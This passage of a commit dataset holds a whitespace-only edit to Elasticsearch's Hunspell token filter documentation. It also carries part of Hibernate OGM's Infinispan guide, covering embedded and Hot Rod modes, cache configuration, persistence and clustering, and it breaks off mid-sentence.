sticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,girirajsharma\/elasticsearch,wangtuo\/elasticsearch,nilabhsagar\/elasticsearch,girirajsharma\/elasticsearch,mohit\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,glefloch\/elasticsearch,MaineC\/elasticsearch,fforbeck\/elasticsearch,masaruh\/elasticsearch,fforbeck\/elasticsearch,liweinan0423\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,ricardocerq\/elasticsearch,obourgain\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,gmarz\/elasticsearch,henakamaMSFT\/elasticsearch,ricardocerq\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,strapdata\/elassandra5-rc,StefanGor\/elasticsearch,artnowo\/elasticsearch,pozhidaevak\/elasticsearch,JervyShi\/elasticsearch,masaruh\/elasticsearch,Shepard1212\/elasticsearch,jprante\/elasticsearch,gmarz\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,sreeramjayan\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra5-rc,s1monw\/elasticsearch,dpursehouse\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,sreeramjayan\/elasticsearch,elasticdog\/elasticsearch,spiegela\/elasticsearch,zkidkid\/elasticsearch,dongjoon-hyun\/elasticsearch,MisterAndersen\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,obourgain\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,zkidkid\/elasticsearch,yanjunh\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra5-rc,vroyer\/elasticassandra,dongjoon-hyun\/elasticsearch,njlawton\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,glefloch\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,strapdata\/elassandra5-rc,Shepard1212\/elasticsearch,i-am-Nathan\/elasticsearch,jimczi\/elasticsearch,elasticdog\/elasticsearch,HonzaKral\/elasticsearch,awislowski\/elasticsearch,dongjoon-hyun\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,dongjoon-hyun\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,dongjoon-hyun\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,JSCooke\/elasticsearch,scorpionvicky\/elasticsearch,geidies\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,fernandozhu\/elasticsearch,MisterAndersen\/elasticsearch,yanjunh\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,rajanm\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/hunspell-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/hunspell-tokenfilter.asciidoc","new_contents":"[[analysis-hunspell-tokenfilter]]\n=== Hunspell Token Filter\n\nBasic support for hunspell stemming. Hunspell dictionaries will be\npicked up from a dedicated hunspell directory on the filesystem\n(`<path.conf>\/hunspell`). Each dictionary is expected to\nhave its own directory named after its associated locale (language).\nThis dictionary directory is expected to hold a single `*.aff` and\none or more `*.dic` files (all of which will automatically be picked up).\nFor example, assuming the default hunspell location is used, the\nfollowing directory layout will define the `en_US` dictionary:\n\n[source,js]\n--------------------------------------------------\n- conf\n |-- hunspell\n | |-- en_US\n | | |-- en_US.dic\n | | |-- en_US.aff\n--------------------------------------------------\n\nEach dictionary can be configured with one setting:\n\n`ignore_case`::\n If true, dictionary matching will be case insensitive\n (defaults to `false`)\n\nThis setting can be configured globally in `elasticsearch.yml` using\n\n* `indices.analysis.hunspell.dictionary.ignore_case`\n\nor for specific dictionaries:\n\n* `indices.analysis.hunspell.dictionary.en_US.ignore_case`.\n\nIt is also possible to add `settings.yml` file under the dictionary\ndirectory which holds these settings (this will override any other\nsettings defined in the `elasticsearch.yml`).\n\nOne can use the hunspell stem filter by configuring it the analysis\nsettings:\n\n[source,js]\n--------------------------------------------------\n{\n \"analysis\" : {\n \"analyzer\" : {\n \"en\" : {\n \"tokenizer\" : \"standard\",\n \"filter\" : [ \"lowercase\", \"en_US\" ]\n }\n },\n \"filter\" : {\n \"en_US\" : {\n \"type\" : \"hunspell\",\n \"locale\" : \"en_US\",\n \"dedup\" : true\n }\n }\n }\n}\n--------------------------------------------------\n\nThe hunspell token filter accepts four options:\n\n`locale`::\n A locale for this filter. If this is unset, the `lang` or\n `language` are used instead - so one of these has to be set.\n\n`dictionary`::\n The name of a dictionary. The path to your hunspell\n dictionaries should be configured via\n `indices.analysis.hunspell.dictionary.location` before.\n\n`dedup`::\n If only unique terms should be returned, this needs to be\n set to `true`. Defaults to `true`.\n\n`longest_only`::\n If only the longest term should be returned, set this to `true`.\n Defaults to `false`: all possible stems are returned.\n\nNOTE: As opposed to the snowball stemmers (which are algorithm based)\nthis is a dictionary lookup based stemmer and therefore the quality of\nthe stemming is determined by the quality of the dictionary.\n\n[float]\n==== Dictionary loading\n\nBy default, the default Hunspell directory (`config\/hunspell\/`) is checked\nfor dictionaries when the node starts up, and any dictionaries are\nautomatically loaded.\n\nDictionary loading can be deferred until they are actually used by setting\n`indices.analysis.hunspell.dictionary.lazy` to `true` in the config file.\n\n[float]\n==== References\n\nHunspell is a spell checker and morphological analyzer designed for\nlanguages with rich morphology and complex word compounding and\ncharacter encoding.\n\n1. Wikipedia, http:\/\/en.wikipedia.org\/wiki\/Hunspell\n\n2. Source code, http:\/\/hunspell.sourceforge.net\/\n\n3. Open Office Hunspell dictionaries, http:\/\/wiki.openoffice.org\/wiki\/Dictionaries\n\n4. Mozilla Hunspell dictionaries, https:\/\/addons.mozilla.org\/en-US\/firefox\/language-tools\/\n\n5. Chromium Hunspell dictionaries,\n http:\/\/src.chromium.org\/viewvc\/chrome\/trunk\/deps\/third_party\/hunspell_dictionaries\/\n","old_contents":"[[analysis-hunspell-tokenfilter]]\n=== Hunspell Token Filter\n\nBasic support for hunspell stemming. Hunspell dictionaries will be\npicked up from a dedicated hunspell directory on the filesystem\n(`<path.conf>\/hunspell`). Each dictionary is expected to\nhave its own directory named after its associated locale (language).\nThis dictionary directory is expected to hold a single `*.aff` and\none or more `*.dic` files (all of which will automatically be picked up).\nFor example, assuming the default hunspell location is used, the\nfollowing directory layout will define the `en_US` dictionary:\n\n[source,js]\n--------------------------------------------------\n- conf\n |-- hunspell\n | |-- en_US\n | | |-- en_US.dic\n | | |-- en_US.aff\n--------------------------------------------------\n\nEach dictionary can be configured with one setting:\n\n`ignore_case`::\n If true, dictionary matching will be case insensitive\n (defaults to `false`)\n\nThis setting can be configured globally in `elasticsearch.yml` using\n\n* `indices.analysis.hunspell.dictionary.ignore_case`\n\nor for specific dictionaries:\n\n* `indices.analysis.hunspell.dictionary.en_US.ignore_case`.\n\nIt is also possible to add `settings.yml` file under the dictionary\ndirectory which holds these settings (this will override any other\nsettings defined in the `elasticsearch.yml`).\n\nOne can use the hunspell stem filter by configuring it the analysis\nsettings:\n\n[source,js]\n--------------------------------------------------\n{\n \"analysis\" : {\n \"analyzer\" : {\n \"en\" : {\n \"tokenizer\" : \"standard\",\n \"filter\" : [ \"lowercase\", \"en_US\" ]\n }\n },\n \"filter\" : {\n \"en_US\" : {\n \"type\" : \"hunspell\",\n \"locale\" : \"en_US\",\n \"dedup\" : true\n }\n }\n }\n}\n--------------------------------------------------\n\nThe hunspell token filter accepts four options:\n\n`locale`::\n A locale for this filter. If this is unset, the `lang` or\n `language` are used instead - so one of these has to be set.\n\n`dictionary`::\n The name of a dictionary. The path to your hunspell\n dictionaries should be configured via\n `indices.analysis.hunspell.dictionary.location` before.\n\n`dedup`::\n If only unique terms should be returned, this needs to be\n set to `true`. Defaults to `true`.\n\n`longest_only`::\n If only the longest term should be returned, set this to `true`.\n Defaults to `false`: all possible stems are returned.\n\nNOTE: As opposed to the snowball stemmers (which are algorithm based)\nthis is a dictionary lookup based stemmer and therefore the quality of\nthe stemming is determined by the quality of the dictionary.\n\n[float]\n==== Dictionary loading\n\nBy default, the default Hunspell directory (`config\/hunspell\/`) is checked \nfor dictionaries when the node starts up, and any dictionaries are \nautomatically loaded.\n\nDictionary loading can be deferred until they are actually used by setting\n`indices.analysis.hunspell.dictionary.lazy` to `true`in the config file.\n\n[float]\n==== References\n\nHunspell is a spell checker and morphological analyzer designed for\nlanguages with rich morphology and complex word compounding and\ncharacter encoding.\n\n1. Wikipedia, http:\/\/en.wikipedia.org\/wiki\/Hunspell\n\n2. Source code, http:\/\/hunspell.sourceforge.net\/\n\n3. Open Office Hunspell dictionaries, http:\/\/wiki.openoffice.org\/wiki\/Dictionaries\n\n4. Mozilla Hunspell dictionaries, https:\/\/addons.mozilla.org\/en-US\/firefox\/language-tools\/\n\n5. Chromium Hunspell dictionaries,\n http:\/\/src.chromium.org\/viewvc\/chrome\/trunk\/deps\/third_party\/hunspell_dictionaries\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f16e5702e7bba3492d608a8683beba105428273","subject":"OGM-1206 Highlight the referential integrity problem better in the Hot Rod documentation","message":"OGM-1206 Highlight the referential integrity problem better in the Hot Rod documentation\n","repos":"Sanne\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/modules\/infinispan.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/modules\/infinispan.asciidoc","new_contents":"[[ogm-infinispan]]\n\n\/\/ vim: set colorcolumn=100:\n\n== Infinispan\n\nInfinispan is an open source in-memory data grid focusing on high performance.\nAs a data grid, you can deploy it on multiple servers - referred to as nodes -\nand connect to it as if it were a single storage engine:\nit will cleverly distribute both the computation effort and the data storage.\n\nIt is trivial to setup on a single node and Hibernate OGM knows how to boot one,\nso you can easily try it out.\nBut Infinispan really shines in multiple node deployments:\nyou will need to configure some networking details\nbut nothing changes in terms of application behaviour,\nwhile performance and data size can scale linearly.\n\nFrom all its features we will only describe those relevant to Hibernate OGM;\nfor a complete description of all its capabilities and configuration options,\nrefer to the Infinispan project documentation at\nhttp:\/\/infinispan.org\/documentation\/[infinispan.org].\n\n=== Why use Hibernate OGM with Infinispan?\n\nInfinispan provides great scalability and elasticity features but\nit can have a steep learning curve.\n\nIf you are already familiar with the JPA API you will\nbe able to store your data in Infinispan quickly and you will also benefit\nfrom the optimizations that a framework like Hibernate OGM can\napply under the hood.\n\nIn particular:\n\n* you can get started without having to learn `Protobuf` first\n* no need to learn the Infinispan API\n* Hibernate OGM will setup and manage the `Hot Rod client` for you\n* same API as Hibernate ORM, meaning that you can use the same tools\n\nYou will still need to learn about Infinispan, all its capabilities and how to configure\nthem to reach your application top performance, but you can get a proof of concept\ndone quickly with the example configuration.\n\n=== Infinispan: Choosing between Embedded Mode and Hot Rod\n\nJava applications can use Infinispan in two fundamentally different ways:\n\n* Run Infinispan in _Embedded Mode_.\n* Connect to an _Infinispan Server_ using an _Hot Rod client_.\n\nHibernate OGM supports connecting in either mode, but since the APIs and capabilities\nare different in the two modes, it provides two different modules\neach having its own set of configuration options and features.\n\nRunning Infinispan in _Embedded Mode_ implies that the Infinispan node is running\nin the same JVM as the code using it.\nThe benefit is that some data (or all data) will be stored on the same JVM, making reads\nof this data extremely fast and efficient as there won't be RPCs to other systems.\nWrite operations will still need to issue some coordination RPCs but they also\nbenefit from a reduction of necessary operations.\n\nHowever the very fact that some data is stored in the same JVM is also the drawback\nof this choice: this typically implies having to configure your JVM for larger\nheap sizes, which are harder to tune for optimal performance. Other system\nparameters might also need to be configured as this JVM node is now to be treated\nas a \"data holding node\" rather than a stateless app node.\nSome architects and system administrators will not like that.\n\nWhen connecting to an _Infinispan Server_ over the _Hot Rod client_, the architecture\nis similar to having Hibernate connect to traditional database: the data is stored\non the _Infinispan Server_ nodes, and Hibernate OGM uses a client with a pool of\nTCP connections to talk to the server.\nBut the Hot Rod client is not transactional, see the limitation described here:\n(<<storage-principles-of-infinispan-dataprovider>>).\n\nAnother important difference, is that when connecting to _Infinispan Server_ via\n_Hot Rod_ the data is encoded using _Google Protobuf_, which requires a schema.\nThis schema is auto-generated by Hibernate OGM.\n\nHaving a _Protobuf Schema_ makes it possible to evolve the schema in non-destructive\nways, and makes it possible for other clients to access the data - even clients written\nin other programming languages.\n\n[NOTE]\n====\nMost introductory tutorials of Hibernate OGM focus on Infinispan in _Embedded Mode_\nbecause in this mode OGM can start its own embedded Infinispan node, using\na simple, local only Infinispan configuration.\n\nWhen using _Infinispan Server_ instead, you'll need to http:\/\/infinispan.org\/download\/[download\nthe server distribution], unpack and start it, then set the Hibernate OGM configuration\nproperties so that the integrated Hot Rod client knows how to connect to it.\n====\n\n[TIP]\n====\n[.lead]\nAdvanced performance options & interaction with Hibernate 2nd level caching\n\nWhen using Infinispan in Embedded Mode, and it's caches are configured in `REPLICATION` Mode,\nall nodes will contain a full replica of the database: write performance won't scale but\nyour reads will be very fast and scale up linearly with the size of the cluster,\nmaking usage of Hibernate's 2nd level cache redundant.\n\nWhen configuring Infinispan in `DISTRIBUTED` cache mode, each of your nodes will have a\nlocal copy of a slice of your data; remember you can tune how large the section\nshould be with various Infinispan configuration options (such as _numOwners_), and you\ncould combine this with Hibernate's 2nd level caching and\/or enable Infinispan's\n1st level caching.\n\nYou can even combine Infinispan with having it passivate to other storage systems\nsuch as a RDBMs or another NoSQL engine; such storage can be configured to be asynchronous.\nThis option is available to both Infinispan Embedded and Infinispan Server; it's even possible\nto use a light layer of Infinispan Embedded - containing a small data set - and have it\nbacked by an Infinispan Server cluster to expand its storage capabilities without\nhaving to enlarge heap size too much on the embedded, application nodes.\n\nFinally, remember that options such as replication vs distribution (`CacheMode`) and passivation\nto additional storage (``CacheStore``s) can be configured differently for each of Infinispan caches.\n====\n\n[[ogm-infinispan-embedded]]\n=== Hibernate OGM & Infinispan Embedded\n\nLet's see how to configure and use Hibernate OGM with Infinispan in Embedded Mode.\n\nFor usage of Infinispan Server over Hot Rod, skip to <<ogm-infinispan-remote>>.\n\n[[ogm-infinispan-configuration]]\n\n==== Configure Hibernate OGM for Infinispan Embedded\n\nYou configure Hibernate OGM and Infinispan in two steps basically:\n\n* Add the dependencies to your classpath\n* And then choose one of:\n\n** Use the default Infinispan configuration (no action needed)\n** Point to your own configuration resource file\n** Point to a [acronym]`JNDI` name of an existing instance of an Infinispan `CacheManager`\n\n* If you need to run JPQL or HQL queries, add Hibernate Search on the classpath\n (<<ogm-query-using-hibernate-search>>)\n\nNote that, except when using [acronym]`JNDI`, Hibernate OGM will bootstrap and Infinispan Embedded node\nin your same JVM, and terminate it on shutdown of the Hibernate instance.\n\n[CAUTION]\n====\nIf you have Hibernate OGM boot Infinispan using a clustered configuration, this might automatically join the cluster of\nother Infinispan nodes running in your network: the default is automatic discovery!\n====\n\n[[ogm-infinispan-adddepencies]]\n\n==== Adding Infinispan dependencies\n\nTo add the dependencies for the Hibernate OGM extensions for Infinispan Embedded via Maven, add the following module:\n\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-infinispan-embedded<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\nIf you're not using a dependency management tool,\ncopy all the dependencies from the distribution in the directories:\n\n* `\/lib\/required`\n* `\/lib\/infinispan`\n* Optionally - depending on your container - you might need some of the jars from `\/lib\/provided`\n\n\n[[ogm-infinispan-configuration-properties]]\n\n==== Infinispan specific configuration properties\n\nThe advanced configuration details of an Infinispan Cache\nare defined in an Infinispan specific XML configuration file;\nthe Hibernate OGM properties are simple\nand usually just point to this external resource.\n\nTo use the default configuration provided by Hibernate OGM -\nwhich is a good starting point for new users - you don't have to set any property.\n\n.Hibernate OGM properties for Infinispan\n`hibernate.ogm.datastore.provider`::\nSet it to `infinispan_embedded` to use Infinispan as the datastore provider in embedded mode.\n`hibernate.ogm.infinispan.cachemanager_jndi_name`::\nIf you have an Infinispan `EmbeddedCacheManager` registered in JNDI,\nprovide the JNDI name and Hibernate OGM will use this instance\ninstead of starting a new `CacheManager`.\nThis will ignore any further configuration properties\nas Infinispan is assumed being already configured.\nInfinispan can typically be pushed to JNDI via WildFly, Spring or Seam.\n`hibernate.ogm.infinispan.configuration_resource_name`::\nShould point to the resource name of an Infinispan configuration file.\nThis is ignored in case [acronym]`JNDI` lookup is set.\nDefaults to `org\/hibernate\/ogm\/datastore\/infinispan\/default-config.xml`.\n`hibernate.ogm.datastore.keyvalue.cache_storage`::\nThe strategy for persisting data in Infinispan.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.keyvalue.options.CacheMappingType` enum):\n\n* `CACHE_PER_TABLE`: A dedicated cache will be used for each entity type, association type and id source table.\n* `CACHE_PER_KIND`: Three caches will be used: one cache for all entities, one cache for all associations and one cache for all id sources.\n\n+\nDefaults to `CACHE_PER_TABLE`. It is the recommended strategy as it makes it easier to target a specific cache for a given entity.\n`hibernate.ogm.datastore.create_database`::\nIf set to `true` Hibernate OGM will create any missing Cache definitions on the Infinispan Server.\nThis requires the Infinispan Server configuration to have a default configuration defined, as this will be copied to the newly defined caches.\nIf set to `false` an exception is thrown when a Cache is expected but not explicitly configured on the server.\nDefaults to `false`.\n\n[NOTE]\n====\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou should use the constants accessible via `org.hibernate.ogm.datastore.infinispan.InfinispanProperties`\nwhen specifying the configuration properties listed above.\n\nCommon properties shared between stores are declared on `OgmProperties`\n(a super interface of `InfinispanProperties`).\n\nFor maximum portability between stores, use the most generic interface possible.\n====\n\n==== Cache names used by Hibernate OGM\n\nDepending on the cache mapping approach, Hibernate OGM will either:\n\n* store each entity type, association type and id source table in a dedicated cache\n very much like what Hibernate ORM would do. This is the `CACHE_PER_TABLE` approach.\n* store data in three different caches when using the `CACHE_PER_KIND` approach:\n** `ENTITIES`: is going to be used to store the main attributes of all your entities.\n** `ASSOCIATIONS`: stores the association information representing the links between entities.\n** `IDENTIFIER_STORE`: contains internal metadata that Hibernate OGM needs\n to provide sequences and auto-incremental numbers for primary key generation.\n\nThe preferred strategy is `CACHE_PER_TABLE` as it offers both more fine grained configuration options\nand the ability to work on specific entities in a more simple fashion.\n\nIn the following paragraphs, we will explain which aspects of Infinispan\nyou're likely to want to reconfigure from their defaults.\nAll attributes and elements from Infinispan which we don't mention are safe to ignore.\nRefer to the http:\/\/infinispan.org\/documentation\/[Infinispan User Guide]\nfor the guru level performance tuning and customizations.\n\nAn Infinispan configuration file is an XML file complying with the Infinispan schema;\nthe basic structure is shown in the following example:\n\n.Simple example of an Infinispan configuration file\n====\n[source, XML]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<infinispan\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"urn:infinispan:config:9.1 http:\/\/www.infinispan.org\/schemas\/infinispan-config-9.1.xsd\"\n xmlns=\"urn:infinispan:config:9.1\">\n\n <cache-container name=\"HibernateOGM\" default-cache=\"DEFAULT\">\n\n <!-- Default cache settings -->\n <local-cache name=\"DEFAULT\">\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <\/local-cache>\n\n <local-cache name=\"User\"\/>\n\n <local-cache name=\"Order\"\/>\n\n <local-cache name=\"associations_User_Order\"\/>\n\n <\/cache-container>\n<\/infinispan>\n----\n====\n\nThere are global settings that can be set before the `cache_container` section.\nThese settings will affect the whole instance;\nmainly of interest for Hibernate OGM users is the `jgroups` element\nin which we will set JGroups configuration overrides.\n\nInside the `cache-container` section are defined explicit named caches and their configurations\nas well as the default cache (named `DEFAULT` here) if we want to affect all named caches.\nThis is where we will likely want to configure clustering modes, eviction policies and ``CacheStore``s.\n\n[[ogm-infinispan-storage]]\n\n==== Manage data size\n\nIn its default configuration Infinispan stores all data in the heap of the JVM;\nin this barebone mode it is conceptually not very different than using a HashMap:\nthe size of the data should fit in the heap of your VM,\nand stopping\/killing\/crashing your application will get all data lost\nwith no way to recover it.\n\nTo store data permanently (out of the JVM memory) a `CacheStore` should be enabled.\nThe Infinispan project provides many `CacheStore` implementations;\na simple one is the http:\/\/infinispan.org\/docs\/stable\/user_guide\/user_guide.html#single_file_store[\"Single File Store\"]\nwhich is able to store data in simple binary files, on any read\/write mounted filesystem;\nYou can find many more implementations to store your data in anything\nfrom JDBC connected relational databases, other NoSQL engines such as MongoDB and Cassandra,\nor even delegate to other Infinispan clusters.\nFinally, implementing a custom `CacheStore` is quite easy.\n\nTo limit the memory consumption of the precious heap space,\nyou can activate a `passivation` or an `eviction` policy;\nagain there are several strategies to play with,\nfor now let's just consider you'll likely need one to avoid running out of memory\nwhen storing too many entries in the bounded JVM memory space;\nof course you don't need to choose one while experimenting with limited data sizes:\nenabling such a strategy doesn't have any other impact\nin the functionality of your Hibernate OGM application\n(other than performance: entries stored in the Infinispan in-memory space\nis accessed much quicker than from any CacheStore).\n\nA `CacheStore` can be configured as write-through,\ncommitting all changes to the `CacheStore` before returning (and in the same transaction)\nor as write-behind.\nA write-behind configuration is normally not encouraged in storage engines,\nas a failure of the node implies some data might be lost\nwithout receiving any notification about it,\nbut this problem is mitigated in Infinispan because of its capability\nto combine CacheStore write-behind\nwith a synchronous replication to other Infinispan nodes.\n\n.Enabling a FileCacheStore and eviction\n====\n\n\n[source, XML]\n----\n<local-cache name=\"User\">\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <eviction strategy=\"LIRS\" max-entries=\"2000\"\/>\n <persistence passivation=\"true\">\n <file-store\n shared=\"false\"\n path=\"\/var\/infinispan\/myapp\/users\">\n <write-behind flush-lock-timeout=\"15000\" thread-pool-size=\"5\" \/>\n <\/file-store>\n <\/persistence>\n<\/local-cache>\n----\n\n====\n\nIn this example we enabled both `eviction` and a `CacheStore` (the `persistence` element).\n`LIRS` is one of the choices we have for eviction strategies.\nHere it is configured to keep (approximately) 2000 entries in live memory\nand evict the remaining as a memory usage control strategy.\n\nThe `CacheStore` is enabling `passivation`,\nwhich means that the entries which are evicted are stored on the filesystem.\n\n[WARNING]\n====\nYou could configure an eviction strategy while not configuring a passivating CacheStore!\nThat is a valid configuration for Infinispan but will have the evictor permanently remove entries.\nHibernate OGM will break in such a configuration.\n====\n\n[[ogm-infinispan-clustering]]\n\n==== Clustering: store data on multiple Infinispan nodes\n\nThe best thing about Infinispan is that all nodes are treated equally\nand it requires almost no beforehand capacity planning:\nto add more nodes to the cluster you just have to start new JVMs,\non the same or different physical servers,\nhaving your same Infinispan configuration and your same application.\n\nInfinispan supports several clustering _cache modes_;\neach mode provides the same API and functionality\nbut with different performance, scalability and availability options:\n\n.Infinispan cache modes\nlocal::\nUseful for a single VM: networking stack is disabled\nreplication::\nAll data is replicated to each node;\neach node contains a full copy of all entries.\nConsequentially reads are faster but writes don't scale as well.\nNot suited for very large datasets.\ndistribution::\nEach entry is distributed on multiple nodes for redundancy and failure recovery,\nbut not to all the nodes.\nProvides linear scalability for both write and read operations.\ndistribution is the default mode.\n\nTo use the `replication` or `distribution` cache modes\nInfinispan will use JGroups to discover and connect to the other nodes.\n\nIn the default configuration,\nJGroups will attempt to autodetect peer nodes using a multicast socket;\nthis works out of the box in the most network environments\nbut will require some extra configuration in cloud environments\n(which often block multicast packets) or in case of strict firewalls.\nSee the http:\/\/www.jgroups.org\/manual\/html_single\/[JGroups reference documentation],\nspecifically look for _Discovery Protocols_ to customize the detection of peer nodes.\n\nNowadays, the [acronym]`JVM` defaults to use [acronym]`IPv6` network stack;\nthis will work fine with JGroups, but only if you configured [acronym]`IPv6` correctly.\nIt is often useful to force the [acronym]`JVM` to use [acronym]`IPv4`.\n\nIt is also important to let JGroups know which networking interface you want to use;\nit will bind to one interface by default, but if you have multiple network interfaces\nthat might not be the one you expect.\n\n.JVM properties to set for clustering\n====\n[source]\n----\n#192.168.122.1 is an example IPv4 address\n-Djava.net.preferIPv4Stack=true -Djgroups.bind_addr=192.168.122.1\n----\n====\n\n[NOTE]\n====\nYou don't need to use [acronym]`IPv4`: JGroups is compatible with [acronym]`IPv6`\nprovided you have routing properly configured and valid addresses assigned.\n\nThe `jgroups.bind_addr` needs to match a placeholder name\nin your JGroups configuration in case you don't use the default one.\n====\n\nThe default configuration uses `distribution` as cache mode\nand uses the `jgroups-tcp.xml` configuration for JGroups,\nwhich is contained in the Infinispan jar\nas the default configuration for Infinispan users.\nLet's see how to reconfigure this:\n\n.Reconfiguring cache mode and override JGroups configuration\n====\n[source, XML]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<infinispan\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"urn:infinispan:config:9.1 http:\/\/www.infinispan.org\/schemas\/infinispan-config-9.1.xsd\"\n xmlns=\"urn:infinispan:config:9.1\">\n\n <jgroups>\n <stack-file name=\"custom-stack\" path=\"my-jgroups-conf.xml\" \/>\n <\/jgroups>\n\n <cache-container name=\"HibernateOGM\" default-cache=\"DEFAULT\">\n <transport stack=\"custom-stack\" \/>\n\n <!-- *************************************** -->\n <!-- Default cache used as template -->\n <!-- *************************************** -->\n <distributed-cache name=\"DEFAULT\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <!-- Override the cache mode: -->\n <replicated-cache name=\"User\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/replicated-cache>\n\n <distributed-cache name=\"Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <distributed-cache name=\"associations_User_Order\" mode=\"SYNC\">\n <locking striping=\"false\" acquire-timeout=\"10000\"\n concurrency-level=\"500\" write-skew=\"false\" \/>\n <transaction mode=\"NON_DURABLE_XA\" \/>\n <state-transfer enabled=\"true\" timeout=\"480000\"\n await-initial-transfer=\"true\" \/>\n <\/distributed-cache>\n\n <\/cache-container>\n\n<\/infinispan>\n----\n====\n\nIn the example above we specify a custom JGroups configuration file\nand set the cache mode for the default cache to `distribution`;\nthis is going to be inherited by the `Order` and the `associations_User_Order` caches.\nBut for `User` we have chosen (for the sake of this example) to use `replication`.\n\nNow that you have clustering configured, start the service on multiple nodes.\nEach node will need the same configuration and jars.\n\n[TIP]\n====\nWe have just shown how to override the clustering mode\nand the networking stack for the sake of completeness, but you don't have to!\n\nStart with the default configuration and see if that fits you.\nYou can fine tune these setting when you are closer to going in production.\n====\n\n[[ogm-infinispan-storage-principles]]\n==== Storage principles\n\nTo describe things simply, each entity is stored under a single key.\nThe value itself is a map containing the columns \/ values pair.\n\nEach association from one entity instance to (a set of) another is stored under a single key.\nThe value contains the navigational information to the (set of) entity.\n\n[[ogm-infinispan-built-in-types]]\n===== Properties and built-in types\n\nEach entity is represented by a map.\nEach property or more precisely column is represented by an entry in this map,\nthe key being the column name.\n\nHibernate OGM support by default the following property types:\n\n* `java.lang.String`\n* `java.lang.Character` (or char primitive)\n* `java.lang.Boolean` (or boolean primitive); Optionally the annotations `@Type(type = \"true_false\")`, `@Type(type = \"yes_no\")` and `@Type(type = \"numeric_boolean\")` can be used to map boolean properties to the characters 'T'\/'F', 'Y'\/'N' or the int values 0\/1, respectively.\n* `java.lang.Byte` (or byte primitive)\n* `java.lang.Short` (or short primitive)\n* `java.lang.Integer` (or integer primitive)\n* `java.lang.Long` (or long primitive)\n* `java.lang.Integer` (or integer primitive)\n* `java.lang.Float` (or float primitive)\n* `java.lang.Double` (or double primitive)\n\n* `java.math.BigDecimal`\n* `java.math.BigInteger`\n\n* `java.util.Calendar`\n* `java.util.Date`\n* `java.util.UUID`\n* `java.util.URL`\n\n[NOTE]\n====\nHibernate OGM doesn't store null values in Infinispan,\nsetting a value to null is the same as removing the corresponding entry\nfrom Infinispan.\n\nThis can have consequences when it comes to queries on null value.\n====\n\n===== Identifiers\n\nEntity identifiers are used to build the key in which the entity is stored in the cache.\n\nThe key is comprised of the following information:\n\n* the identifier column names\n* the identifier column values\n* the entity table (for the `CACHE_PER_KIND` strategy)\n\nIn `CACHE_PER_TABLE`, the table name is inferred from the cache name.\nIn `CACHE_PER_KIND`, the table name is necessary to identify the entity 